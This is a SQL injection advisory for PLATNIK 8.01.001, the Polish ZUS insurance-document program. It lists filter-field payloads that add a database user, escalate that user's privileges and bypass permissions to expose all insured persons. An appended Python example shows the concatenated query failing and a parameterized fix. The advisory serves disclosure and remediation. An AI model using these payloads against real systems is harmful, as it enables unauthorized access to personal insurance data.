# Exploit Title: PLATNIK - SQL Injection Vulnerability
# Discovered by: podatnik386

Description:
PLATNIK is the official Polish program to support documents for the Social Insurance Company (pl. ZUS). The application includes several fields that are vulnerable to SQL injection.

Vulnerable version: 8.01.001
http://www.platnik.info.pl/

EXPLOIT (Tested on MSSQL2005 Express):
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

#### Field: Administration/Dziennik-Archiwum dziennika operacji (Events) tab / filter field (<=, =>, <, >)

<'YYYY-MM-DD') SQL_QUERY

FOR EXAMPLE

How to add new user:
<'2010-02-28')INSERT INTO dbo.UZYTKOWNIK VALUES('LOGIN', 'TEST', 'TEST', 'password hash', '2010-02-28 15:46:48', null, 'A', null)--

How to increase user privileges:
<'2010-02-28')INSERT INTO dbo.UPRAWNIENIA VALUES(id_user, id_platnik)--

#### Field: Documents (ZUS ZSWA) tab / III-VI tab / filter field - okres pracy (work period)

FOR EXAMPLE

Show all insured members (query ignores the permissions assigned to the user):
<05-02-2010) or 1=1--

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

The manufacturer has been informed prior to publication (but they ignored the vulnerability).
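Added example (not part of the original advisory and not PLATNIK's code): why the work-period filter value above escapes the permission check when the field is concatenated into the statement, next to a version that allow-lists the operator and binds the date as a parameter. The table, column and function names and the query shape are assumptions, and SQLite stands in for the MSSQL back end.

```python
import re
import sqlite3
from datetime import datetime

# Constructed sample data; table and column names are hypothetical.
def make_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE insured (name TEXT, payer_id INTEGER, work_end TEXT)")
    db.executemany("INSERT INTO insured VALUES (?, ?, ?)", [
        ("Kowalski", 1, "2010-01-31"),
        ("Nowak", 1, "2010-03-15"),
        ("Wisniewski", 2, "2010-01-10"),  # payer 2: outside the user's permissions
    ])
    return db

def filter_concatenated(db, payer_id, filter_text):
    # Assumed vulnerable pattern: the filter field is pasted into the statement,
    # so anything after a typed ")" is parsed as SQL, not as a date.
    sql = ("SELECT name FROM insured WHERE payer_id = ? AND (work_end "
           + filter_text + ")")
    return sorted(r[0] for r in db.execute(sql, (payer_id,)))

# Hardened: the operator comes from an allow-list and the date is bound as data.
OPERATORS = {"<": "<", "<=": "<=", ">": ">", ">=": ">="}
FILTER_RE = re.compile(r"\s*(<=|>=|<|>)\s*'?(\d{4}-\d{2}-\d{2})'?\s*")

def filter_parameterized(db, payer_id, filter_text):
    m = FILTER_RE.fullmatch(filter_text)
    if not m:
        raise ValueError("filter must be an operator followed by YYYY-MM-DD")
    op, day = m.groups()
    datetime.strptime(day, "%Y-%m-%d")  # raises ValueError on impossible dates
    sql = ("SELECT name FROM insured WHERE payer_id = ? AND (work_end "
           + OPERATORS[op] + " ?)")
    return sorted(r[0] for r in db.execute(sql, (payer_id, day)))

if __name__ == "__main__":
    db = make_db()
    advisory_filter = "<05-02-2010) or 1=1--"  # filter value quoted in the advisory
    print("concatenated :", filter_concatenated(db, 1, advisory_filter))
    try:
        print("parameterized:", filter_parameterized(db, 1, advisory_filter))
    except ValueError as exc:
        print("parameterized: rejected,", exc)
    print("valid filter :", filter_parameterized(db, 1, "<'2010-02-28'"))
```

On the MSSQL side the same fix is a parameterized command, and running the application under a database login without INSERT rights on the user and permission tables limits what a missed field can do.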